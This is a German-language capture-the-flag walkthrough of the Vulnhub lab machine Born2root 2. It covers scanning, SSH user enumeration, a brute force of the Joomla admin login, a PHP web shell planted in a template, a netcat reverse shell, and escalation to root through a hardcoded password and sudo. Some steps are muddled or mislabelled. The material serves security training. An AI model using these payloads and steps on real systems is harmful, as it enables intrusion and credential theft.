Born2root 2 - Vulnhub - Level: Medium - Bericht

Medium

Verwendete Tools

nmap
nikto
gobuster
joomscan
cewl
hydra
msfconsole
curl
grep

Inhaltsverzeichnis

Reconnaissance

Wie bereits im vorherigen Bericht beginnen wir mit einem ARP-Scan, um die IP-Adresse des Ziels im lokalen Netzwerk zu ermitteln.

┌──(root㉿CCat)-[~]
└─# arp-scan -l
192.168.2.144 08:00:27:21:b0:c2 PCS Systemtechnik GmbH

Wir haben die IP-Adresse `192.168.2.144` des Ziels gefunden und fügen sie der `/etc/hosts`-Datei hinzu, um die Namensauflösung zu vereinfachen.

┌──(root㉿CCat)-[~]
└─# echo "192.168.2.144 born2root2.vln" >> /etc/hosts

Nun führen wir einen Nmap-Scan durch, um offene Ports und laufende Dienste auf dem Zielsystem zu identifizieren.

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000 | grep open
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
44487/tcp open status 1 (RPC #100024)

Die Ergebnisse zeigen, dass SSH (Port 22), HTTP (Port 80) und RPCbind (Port 111) offen sind. Port 44487 scheint ein Status-Port für RPC zu sein. Wir führen einen vollständigen Nmap-Scan durch, um detailliertere Informationen zu erhalten.

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-31 21:05 CET
Nmap scan report for born2root2.vln (192.168.2.144)
Host is up (0.00019s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 ec:61:97:9f:4d:cb:75:99:59:d4:c1:c4:d4:3e:d9:dc (DSA)
| 2048 89:99:c4:54:9a:18:66:f7:cd:8e:ab:b6:aa:31:2e:c6 (RSA)
| 256 60:be:dd:8f:1a:d7:a3:f3:fe:21:cc:2f:11:30:7b:0d (ECDSA)
|_ 256 39:d9:79:26:60:3d:6c:a2:1e:8b:19:71:c0:e2:5e:5f (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Welcome to my website
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 44487/tcp status
| 100024 1 52140/tcp6 status
| 100024 1 57205/udp6 status
|_ 100024 1 59467/udp status
44487/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:21:B0:C2 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.19 ms born2root2.vln (192.168.2.144)

Der vollständige Nmap-Scan liefert uns SSH-Hostkeys, den HTTP-Titel "Welcome to my website" und Informationen über die RPC-Dienste. Diese Informationen sind nützlich für die weitere Analyse.

Web Enumeration

Wir verwenden Nikto, um den Webserver auf Schwachstellen zu scannen.

- Nikto v2.5.0
+ Target IP: 192.168.2.144
+ Target Hostname: 192.168.2.144
+ Target Port: 80
+ Start Time: 2024-10-31 21:06:08 (GMT+1)

+ Server: Apache/2.4.10 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 2106, size: 56b7a4ae11380, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /css/: Directory indexing found.
+ /css/: This might be interesting.
+ /img/: Directory indexing found.
+ /img/: This might be interesting.
+ /manual/: Web server manual found.
+ /manual/images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /package.json: Node.js package file found. It may contain sensitive information.
+ /README.md: Readme Found.
+ 8102 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2024-10-31 21:06:49 (GMT+1) (41 seconds)

+ 1 host(s) tested

Nikto findet Directory Listing in `/css/` und `/img/`, was bedeutet, dass wir den Inhalt dieser Verzeichnisse einsehen können. Außerdem wird eine `package.json`-Datei gefunden, die möglicherweise sensitive Informationen enthält.

Wir verwenden Gobuster, um weitere Verzeichnisse und Dateien zu finden.

┌──(root㉿CCat)-[~]
└─# gobuster dir -u "http://$IP" -w "/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt" -x txt,php,rar,zip,tar,pub,xls,docx,doc,sql,db,mdb,asp,aspx,accdb,bat,ps1,exe,sh,py,pl,gz,jpeg,jpg,png,html,phtml,xml,csv,dll,pdf,raw,rtf,xlsx,zip,kdbx,bak,svg,pem,crt,json,conf,ELF,elf,c,java,lib,cgi,csh,config,deb,desc,exp,eps,diff,icon,mod,ln,old,rpm,js.map,pHtml -b '503,404,403' -e --no-error -k
http://192.168.2.144/index.html (Status: 200) [Size: 8454]
http://192.168.2.144/img (Status: 301) [Size: 312] [--> http://192.168.2.144/img/]
http://192.168.2.144/css (Status: 301) [Size: 312] [--> http://192.168.2.144/css/]
http://192.168.2.144/manual (Status: 301) [Size: 315] [--> http://192.168.2.144/manual/]
http://192.168.2.144/js (Status: 301) [Size: 311] [--> http://192.168.2.144/js/]
http://192.168.2.144/javascript (Status: 301) [Size: 319] [--> http://192.168.2.144/javascript/]
http://192.168.2.144/vendor (Status: 301) [Size: 315] [--> http://192.168.2.144/vendor/]
http://192.168.2.144/package.json (Status: 200) [Size: 1226]
http://192.168.2.144/LICENSE (Status: 200) [Size: 1093]
http://192.168.2.144/joomla (Status: 301) [Size: 315] [--> http://192.168.2.144/joomla/]

Gobuster bestätigt die Existenz von `index.html`, `img`, `css`, `manual`, `js`, `javascript`, `vendor`, `package.json`, `LICENSE` und `joomla`. Besonders interessant ist das Joomla-Verzeichnis, da es sich um ein Content Management System handelt, das oft Schwachstellen aufweist.

Wir sehen uns die `package.json`-Datei genauer an, da sie möglicherweise sensitive Informationen wie Versionsnummern und Abhängigkeiten enthält.

http://192.168.2.144/package.json
title "New Age"
name "startbootstrap-new-age"
version "4.1.1"
description "A one page app landing page HTML theme for Bootstrap."
keywords
0 "css"
1 "sass"
2 "html"
3 "responsive"
4 "theme"
5 "template"
homepage "https://startbootstrap.com/template-overviews/new-age"
bugs
url "https://github.com/BlackrockDigital/startbootstrap-new-age/issues"
email "feedback@startbootstrap.com"
license "MIT"
author "Start Bootstrap"
contributors
0 "David Miller (http://davidmiller.io/)"
repository
type "git"
url "https://github.com/BlackrockDigital/startbootstrap-new-age.git"
dependencies
bootstrap "4.1.1"
font-awesome "4.7.0"
jquery "3.3.1"
jquery.easing "^1.4.1"
simple-line-icons "2.4.1"
devDependencies
browser-sync "2.24.3"
gulp "^3.9.1"
gulp-clean-css "3.9.4"
gulp-header "2.0.5"
gulp-rename "^1.2.2"
gulp-sass "4.0.1"
gulp-uglify "3.0.0"
https://github.com/StartBootstrap/startbootstrap-new-age/tree/master/dist

Die `package.json`-Datei zeigt, dass die Webseite das "New Age" Theme von Start Bootstrap verwendet. Außerdem werden verschiedene Abhängigkeiten und Entwickler-Tools aufgelistet. Dies kann uns helfen, gezielte Exploits zu finden, falls bekannte Schwachstellen in diesen Versionen vorhanden sind.

Wir versuchen, SSH-Benutzernamen auf dem Zielsystem aufzuzählen, um mögliche Anmeldeinformationen für den SSH-Dienst zu finden.

┌──(root㉿CCat)-[~]
└─# msfconsole -q -x "search ssh_enum"
Matching Modules

# Name Disclosure Date Rank Check Description
- - - -- --
0 auxiliary/scanner/ssh/ssh_enumusers . normal No SSH Username Enumeration
1 \_ action: Malformed Packet . . . Use a malformed packet
2 \_ action: Timing Attack . . . Use a timing attack
3 auxiliary/scanner/ssh/ssh_enum_git_keys . normal No Test SSH Github Access

Wir verwenden das Metasploit-Modul `auxiliary/scanner/ssh/ssh_enumusers`, um Benutzernamen aufzuzählen.

msf6 > use 0
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
USER_FILE => /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set THRESHLD 10
THRESHLD => 10
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set THREADS 10
THREADS => 10
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set rport 22
rport => 22
msf6 auxiliary(scanner/ssh/ssh_enumusers) > Interrupt: use the 'exit' command to quit
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set rhosts 192.168.2.144
rhosts => 192.168.2.144
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run
[*] 192.168.2.144:22 - SSH - Using malformed packet technique
[*] 192.168.2.144:22 - SSH - Checking for false positives
[*] 192.168.2.144:22 - SSH - Starting scan
[+] 192.168.2.144:22 - SSH - User 'mail' found
[+] 192.168.2.144:22 - SSH - User 'root' found
[+] 192.168.2.144:22 - SSH - User 'news' found
[+] 192.168.2.144:22 - SSH - User 'tim' found
[+] 192.168.2.144:22 - SSH - User 'man' found
[+] 192.168.2.144:22 - SSH - User 'bin' found
[+] 192.168.2.144:22 - SSH - User 'games' found
[+] 192.168.2.144:22 - SSH - User 'nobody' found
[+] 192.168.2.144:22 - SSH - User 'backup' found
[+] 192.168.2.144:22 - SSH - User 'daemon' found
[+] 192.168.2.144:22 - SSH - User 'proxy' found

Das Metasploit-Modul hat mehrere Benutzernamen gefunden, darunter `tim`. Dieser Benutzername ist interessant, da er auf der Webseite nicht erwähnt wurde.

Initial Access

Wir führen Joomscan aus, um das Joomla-System auf bekannte Schwachstellen zu untersuchen.

┌──(root㉿CCat)-[~]
└─# joomscan -u 192.168.2.144
____ _____ _____ __ __ ___ ___ __ _ _
(_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
(1337.today)

--=[WASP JoomScan
+++[Version : 0.0.7
+++[Update Date : [2018/09/23]
+++[Authors : Mohammad Reza Espargham , Ali Razmjoo
--=[Code name : Self Challenge
@WASP_JoomScan , @rezesp , @Ali_Razmjo0 , @WASP

Processing http://192.168.2.144 ...


[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] ver 404

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://192.168.2.144/joomla/administrator/

[+] Checking robots.txt existing
[++] robots.txt is not found

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config files are not found


Your Report : reports/192.168.2.144/

Joomscan findet keine Joomla-Version und keine Core-Schwachstellen. Allerdings wird die Admin-Seite unter `http://192.168.2.144/joomla/administrator/` gefunden. Dies ist ein wichtiger Hinweis. Wir suchen nach der Joomla version.

Wir schauen, welche Joomla Versionen verbreitet sind.

┌──(root㉿CCat)-[~]
└─# curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool
{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.89,
"3.2": 0.01,
"3.3": 0.01,
"3.4": 0.04,
"3.5": 11.4,
"3.6": 21.28,
"3.7": 7.44,
"3.8": 16.47,
"3.9": 25.09,
"4.0": 3.07,
"4.1": 1.32,
"4.2": 2.03,
"4.3": 1.41,
"4.4": 1.45,
"5.0": 0.89,
"5.1": 1,
"5.2": 0.19
},
"total": 3171254
}

Wir suchen im Internet nach weiteren Inforationen zu der Webseite und dem cms.

┌──(root㉿CCat)-[~]
└─# dirb http://192.168.2.144
- Entering directory: http://192.168.2.144/joomla/ -
> DIRECTORY: http://192.168.2.144/joomla/administrator/
> DIRECTORY: http://192.168.2.144/joomla/bin/
> DIRECTORY: http://192.168.2.144/joomla/cache/
> DIRECTORY: http://192.168.2.144/joomla/components/
> DIRECTORY: http://192.168.2.144/joomla/images/
> DIRECTORY: http://192.168.2.144/joomla/includes/
+ http://192.168.2.144/joomla/index.php (CODE:200|SIZE:8501)
> DIRECTORY: http://192.168.2.144/joomla/language/
> DIRECTORY: http://192.168.2.144/joomla/layouts/
> DIRECTORY: http://192.168.2.144/joomla/libraries/
> DIRECTORY: http://192.168.2.144/joomla/media/
> DIRECTORY: http://192.168.2.144/joomla/modules/
> DIRECTORY: http://192.168.2.144/joomla/plugins/
> DIRECTORY: http://192.168.2.144/joomla/templates/
> DIRECTORY: http://192.168.2.144/joomla/tmp/

- Entering directory: http://192.168.2.144/javascript/jquery/ -
+ http://192.168.2.144/javascript/jquery/jquery (CODE:200|SIZE:252879)
+ http://192.168.2.144/javascript/jquery/version (CODE:200|SIZE:5)

- Entering directory: http://192.168.2.144/joomla/administrator/ -
> DIRECTORY: http://192.168.2.144/joomla/administrator/cache/
> DIRECTORY: http://192.168.2.144/joomla/administrator/components/
> DIRECTORY: http://192.168.2.144/joomla/administrator/help/
> DIRECTORY: http://192.168.2.144/joomla/administrator/includes/
+ http://192.168.2.144/joomla/administrator/index.php (CODE:200|SIZE:5326)
> DIRECTORY: http://192.168.2.144/joomla/administrator/language/
> DIRECTORY: http://192.168.2.144/joomla/administrator/logs/
> DIRECTORY: http://192.168.2.144/joomla/administrator/modules/
> DIRECTORY: http://192.168.2.144/joomla/administrator/templates/

- Entering directory: http://192.168.2.144/joomla/bin/ -
+ http://192.168.2.144/joomla/bin/index.html (CODE:200|SIZE:31)

- Entering directory: http://192.168.2.144/joomla/cache/ -
+ http://192.168.2.144/joomla/cache/index.html (CODE:200|SIZE:31)

- Entering directory: http://192.168.2.144/joomla/components/ -
+ http://192.168.2.144/joomla/components/index.html (CODE:200|SIZE:31)

- Entering directory: http://192.168.2.144/joomla/images/ -
> DIRECTORY: http://192.168.2.144/joomla/images/banners/
> DIRECTORY: http://192.168.2.144/joomla/images/headers/
+ http://192.168.2.144/joomla/images/index.html (CODE:200|SIZE:31)

- Entering directory: http://192.168.2.144/joomla/includes/ -
+ http://192.168.2.144/joomla/includes/index.html (CODE:200|SIZE:31)

- Entering directory: http://192.168.2.144/joomla/language/ -
+ http://192.168.2.144/joomla/language/index.html (CODE:200|SIZE:31)

- Entering directory: http://192.168.2.144/joomla/layouts/ -
+ http://192.168.2.144/joomla/layouts/index.html (CODE:200|SIZE:31)
> DIRECTORY: http://192.168.2.144/joomla/layouts/joomla/
> DIRECTORY: http://192.168.2.144/joomla/layouts/libraries/
> DIRECTORY: http://192.168.2.144/joomla/layouts/plugins/

- Entering directory: http://192.168.2.144/joomla/libraries/ -
> DIRECTORY: http://192.168.2.144/joomla/libraries/cms/
+ http://192.168.2.144/joomla/libraries/index.html (CODE:200|SIZE:31)
> DIRECTORY: http://192.168.2.144/joomla/libraries/joomla/
> DIRECTORY: http://192.168.2.144/joomla/libraries/legacy/
> DIRECTORY: http://192.168.2.144/joomla/libraries/vendor/
> DIRECTORY: http://192.168.2.144/joomla/plugins/user/

- Entering directory: http://192.168.2.144/joomla/templates/ -
+ http://192.168.2.144/joomla/templates/index.html (CODE:200|SIZE:31)
> DIRECTORY: http://192.168.2.144/joomla/templates/system/

- Entering directory: http://192.168.2.144/joomla/tmp/ -
+ http://192.168.2.144/joomla/tmp/index.html (CODE:200|SIZE:31)

- Entering directory: http://192.168.2.144/joomla/templates/system/ -
> DIRECTORY: http://192.168.2.144/joomla/templates/system/css/
> DIRECTORY: http://192.168.2.144/joomla/templates/system/html/
> DIRECTORY: http://192.168.2.144/joomla/templates/system/images/
+ http://192.168.2.144/joomla/templates/system/index.php (CODE:200|SIZE:0)

Wir schauen im Internet nach Joomla Schwachstellen.

┌──(root㉿CCat)-[~] └─# curl http://192.168.2.144/joomla -s| grep -i Joomla | grep generator
Benutzer: http:///api/v1/users?public=true

Konfigurationsdatei: http:///api/index.php/v1/config/application?public=true

Hier ein Brute Force Angriff.

┌──(root㉿CCat)-[~]
└─# python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
admin:admin

Hier ein Reverse Shell.

┌──(pawn)─(root㉿CCat)-[~/Hackingtools/joomla-bruteforce]
└─# cewl http://192.168.2.144/joomla > cewl.txt
┌──(pawn)─(root㉿CCat)-[~/Hackingtools/joomla-bruteforce]
└─# python3 joomla-brute.py -u http://192.168.2.144/joomla -w ~/cewl.txt -usr tim Kein Erfolg

Wir führen Joomscan noch einmal durch.

┌──(pawn)─(root㉿CCat)-[~/Hackingtools/joomla-bruteforce]
└─# joomscan -u 192.168.2.144/joomla
____ _____ _____ __ __ ___ ___ __ _ _
(_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
(1337.today)

--=[WASP JoomScan
+++[Version : 0.0.7
+++[Update Date : [2018/09/23]
+++[Authors : Mohammad Reza Espargham , Ali Razmjoo
--=[Code name : Self Challenge
@WASP_JoomScan , @rezesp , @Ali_Razmjo0 , @WASP

Processing http://192.168.2.144/joomla ...


[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.6.0

[+] Core Joomla Vulnerability
[++] Joomla! 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation
CVE : CVE-2016-8870 , CVE-2016-8869
EDB : https://www.exploit-db.com/exploits/40637/

Joomla! Core Remote Privilege Escalation Vulnerability
CVE : CVE-2016-9838
EDB : https://www.exploit-db.com/exploits/41157/

Joomla! Core Security Bypass Vulnerability
CVE : CVE-2016-9081
https://developer.joomla.org/security-centre/661-20161003-core-account-modifications.html

Joomla! Core Arbitrary File Upload Vulnerability
CVE : CVE-2016-9836
https://developer.joomla.org/security-centre/665-20161202-core-shell-upload.html

Joomla! Information Disclosure Vulnerability
CVE : CVE-2016-9837
https://developer.joomla.org/security-centre/666-20161203-core-information-disclosure.html

PHPMailer Remote Code Execution Vulnerability
CVE : CVE-2016-10033
https://www.rapid7.com/db/modules/exploit/multi/http/phpmailer_arg_injection
https://github.com/opsxcq/exploit-CVE-2016-10033
EDB : https://www.exploit-db.com/exploits/40969/

PPHPMailer Incomplete Fix Remote Code Execution Vulnerability
CVE : CVE-2016-10045
https://www.rapid7.com/db/modules/exploit/multi/http/phpmailer_arg_injection
EDB : https://www.exploit-db.com/exploits/40969/

[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.2.144/joomla/administrator/components
http://192.168.2.144/joomla/administrator/modules
http://192.168.2.144/joomla/administrator/templates
http://192.168.2.144/joomla/images/banners


[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://192.168.2.144/joomla/administrator/

[+] Checking robots.txt existing
[++] robots.txt is not found

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config files are not found


Your Report : reports/192.168.2.144/

Joomscan findet diesmal die Joomla Version 3.6.0. Es werden auch einige Schwachstellen gefunden.

http://192.168.2.144/joomla/
Hello there !

you may ask yourself for the utility of this blog right ?

k , so basically most of the time then I am Lazy to write in the main website I write here for my travels fastly without giving too much informations !

h yes the universal question , who am I ?

let's start ... I am Tim I am 32 years old , I come from Brisbane but actually living in USA .

I love to travel and I also love music and football ..

So my passions are travel , football , music .

- Break -

Wir versuchen uns mit einem Brute Force Angriff und der gefundenen Joomla Version einzuloggen

┌──(pawn)─(root㉿CCat)-[~/Hackingtools/joomla-bruteforce]
└─# python3 joomla-brute.py -u http://192.168.2.144/joomla -w ~/cewl.txt -usr admin
admin:travel
http://192.168.2.144/joomla/

Nach dem wir nun das Passwort haben melden wir uns an

Login Form Hi Super User, <

Nun wollen wir aus Joomla ein Exploit bauen.

http://192.168.2.144/joomla/index.php/submit-an-article
system($ GET['cmd']); Editing file "/index.php" in template "beez3".
http://192.168.2.144/joomla/administrator/index.php?option=com_templates&view=template&id=503&file=L2luZGV4LnBocA%3D%3D
system($ GET['cmd']);
/*
* @package Joomla.Site
* @subpackage Templates.beez3
*
* @copyright Copyright (C) 2005 - 2016 pen Source Matters, Inc. All rights reserved
* @license GNU General Public License version 2 or later; see LICENSE.txt
*/

// No direct access.
defined('_JEXEC') or die;

JLoaderimport('joomla.filesystem.file');

// Check modules
$showRightColumn = ($this->coun
Message
File successfully saved.

Das funktioniert aber nicht, jetzt bauen wir einen Reverse Shell.

┌──(pawn)─(root㉿CCat)-[~/Hackingtools/joomla-bruteforce]
└─# nc -lvnp 9001

Aber auch das Funktioniert nicht.

Man muss bei den Templates auf das sternchen symbol klicken , das was gelb leuchtet ist das was
dann aktuell verwendet wird.
http://192.168.2.144/joomla/administrator/index.php?option=com_templates&view=styles

Aha ein gelbes Symbol gefunden, und wieder einen Reverse Shell.

┌──(pawn)─(root㉿CCat)-[~/Hackingtools/joomla-bruteforce]
└─# nc -lvnp 9001
listening on [any] 9001
connect to 192.168.2.199 from (UNKNOWN) 192.168.2.144 46399
Linux born2root 3.16.0-6-586 Debian 3.16.56-1 (2018-04-28) i686 GNU/Linux
17:19:13 up 1:15, 0 users, load average: 0.00, 0.00, 0.37
USER TTY FRM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Reverse Shell erfolgreich !

Privilege Escalation

Nachdem wir eine Shell als `www-data` erhalten haben, versuchen wir, unsere Privilegien zu erhöhen. Wir suchen nach SUID-Binärdateien.

www-data@born2root:/$ find / -type f -perm -4000 -ls 2>/dev/null
138907 12 -rwsr-xr-x 1 root root 9468 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
144166 356 -rwsr-xr-- 1 root messagebus 362672 Nov 21 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
144700 552 -rwsr-xr-x 1 root root 562536 Nov 19 2017 /usr/lib/openssh/ssh-keysign
155634 176 -rwsrwxrwx 1 root root 176400 Sep 8 2017 /usr/bin/sudo
696 40 -rwsr-xr-x 1 root root 38868 May 17 2017 /bin/su
1698 28 -rwsr-xr-x 1 root root 26344 Mar 29 2015 /bin/umount
1697 36 -rwsr-xr-x 1 root root 34684 Mar 29 2015 /bin/mount

Interessanterweise ist `sudo` vorhanden und hat die Berechtigung `-rwsrwxrwx`, was bedeutet, dass jeder Benutzer `sudo` mit Root-Rechten ausführen kann. Dies ist höchst ungewöhnlich und deutet auf eine Fehlkonfiguration hin.

Wir überprüfen, ob Capabilities gesetzt sind.

www-data@born2root:/$ getcap -r / 2>/dev/null
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/bin/ping6 = cap_net_raw+ep
/bin/ping = cap_net_raw+ep

Wir suchen nach der /etc/passwd.

www-data@born2root:/$ ls -la /etc/passwd
-rw-r--r-- 1 root root 1562 May 5 2018 /etc/passwd

Die ````/etc/passwd``` ist nicht beschreibbar.

Hier ist die Ausgabe des Eintrags.

www-data@born2root:/var/backups$ ls -la ../mail/
total 40
drwxrwsr-x 2 root mail 4096 May 5 2018 .
drwxr-xr-x 12 root root 4096 Apr 15 2018 ..
-rw-rw- 1 tim mail 26430 May 5 2018 ted

Wir schauen in die home directory.

www-data@born2root:/var/backups$ ls -la /home/
total 12
drwxr-xr-x 3 root root 4096 May 5 2018 .
drwxr-xr-x 21 root root 4096 May 4 2018 ..
drwxr-xr-x 2 root root 4096 May 5 2018 tim

Wir checken nun die Rechte.

www-data@born2root:/var/backups$ cat ../mail/ted
cat: ../mail/ted: Permission denied
www-data@born2root:/home/tim$ ls -la
total 8
drwxr-xr-x 2 root root 4096 May 5 2018 .
drwxr-xr-x 3 root root 4096 May 5 2018 ..

Wir schauen welche html Dokumente gibt.

www-data@born2root:/home/tim$ ls -la /var/www/html/
total 316
drwxr-xr-x 9 root root 4096 May 5 2018 .
drwxr-xr-x 3 root root 4096 May 5 2018 ..
-rw-r--r-- 1 root root 0 Feb 25 2018 .htaccess
-rw-r--r-- 1 www-data www-data 1093 May 3 2018 LICENSE
-rw-r--r-- 1 www-data www-data 4344 May 3 2018 README.md
drwxr-xr-x 2 www-data www-data 4096 May 5 2018 css
drwxr-xr-x 24 www-data www-data 4096 May 5 2018 device-mockups
-rw-r--r-- 1 www-data www-data 3150 May 3 2018 gulpfile.js
drwxr-xr-x 2 www-data www-data 4096 May 5 2018 img
-rw-r--r-- 1 www-data www-data 8454 May 5 2018 index.html
drwxrwxrwx 17 www-data www-data 4096 May 5 2018 joomla
drwxr-xr-x 2 www-data www-data 4096 May 5 2018 js
-rw-r--r-- 1 www-data www-data 252190 May 3 2018 package-lock.json
-rw-r--r-- 1 www-data www-data 1226 May 3 2018 package.json
drwxr-xr-x 2 www-data www-data 4096 May 5 2018 scss
drwxr-xr-x 7 www-data www-data 4096 May 5 2018 vendor

Und wollen die crontab einsehen.

www-data@born2root:/home/tim$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab`
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

Wir schauen was unter opt ist.

www-data@born2root:/home/tim$ ls -la /opt/
total 12
drwxr-xr-x 3 root root 4096 Feb 28 2019 .
drwxr-xr-x 21 root root 4096 May 4 2018 ..
drwxrwxrwx 2 root root 4096 Feb 28 2019 scripts

Die scripts haben Leserechte.

www-data@born2root:/home/tim$ ls -la /opt/scripts/
total 12
drwxrwxrwx 2 root root 4096 Feb 28 2019 .
drwxr-xr-x 3 root root 4096 Feb 28 2019 ..
-rwxr-xr-x 1 tim tim 445 Feb 28 2019 fileshare.py

Eine Interessante Datei gefunden, nun geben wir sie aus.

www-data@born2root:/home/tim$ cat /opt/scripts/fileshare.py
#!/usr/bin/env python

import sys, paramiko

if len(sys.argv) < 5:
print "args missing"
sys.exit(1)

hostname = "localhost"
password = "lulzlol"
source = "/var/www/html/joomla"
dest = "/tmp/backup/joomla"

username = "tim"
port = 22

try:
t = paramiko.Transport((hostname, port))
t.connect(username=username, password=password)
sftp = paramiko.SFTPClient.from_transport(t)
sftp.get(source, dest)

finally:
t.close()

Hier sehen wir ein Passwort und ein Username, die nutzen wir mal aus.

Privilege Escalation

Wir versuchen uns nun bei tim anzumelden, das klappt auch.

www-data@born2root:/home/tim$ su tim
Password:
tim@born2root$

Nun wollen wir schauen was tim alles mit Sudo machen darf.

tim@born2root$ sudo -l
[sudo] password for tim:
Matching Defaults entries for tim on born2root:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User tim may run the following commands on born2root:
(ALL : ALL) ALL

Tim darf sudo ausführen

tim@born2root$ sudo su+#
sudo: su+#: command not found
tim@born2root$ sudo su
root Rechte erhalten!

root@born2root:/home/tim# id
uid=0(root) gid=0(root) groups=0(root)
root@born2root: ls
flag.txt
Hier ist die Flag.

root@born2root: cat flag.txt
.andAHHAbnn.
.aAHHHAAUUAAHHHAn.
dHP^~" "~^THb.
. .AHF YHA. .
| .AHHb. .dHHA. |
| HHAUAAHAbn adAHAAUAHA |
I HF~"_____ ____ ]HHH I
HHI HAPK""~^YUHb dAHHHHHHHHHH IHH
HHI HHHD> .andHH HHUUP^~YHHHH IHH
YUI ]HHP "~Y P~" THH[ IUP
" `HK ]HH' "
THAn. .d.aAAn.b. .dHHP
]HHHHAAUP" "YUAAHHHH[
`HHP^~" .annn. "~^YHH'
YHb ~" "" "~ dHF
"YAb..abdHHbndbndAP"
THHAAb. .adAHHF
"UHHHHHHHHHHU"
]HHUUHHHHHH[
.adHHb "HHHHHbn.
..andAAHHHHHHb.AHHHHHHHAAbnn..
.ndAAHHHHHHUUHHHHHHHHHHUP^~"~^YUHHHAAbn.
"~^YUHHP" "~^YUHHUP" "^YUP^"
"" ""


W00t w00t ! If you are reading this text then Congratulations !!

I hope you liked the second episode of 'Born2root' if you liked it please ping me in Twitter @h4d3sw0rm .

If you want to try more boxes like this created by me , try this new sweet lab called 'Wizard-Labs' which is a platform which hosts many boot2root machines to improve your pentesting skillset https://labs.wizard-security.net !
Until we meet again :-)
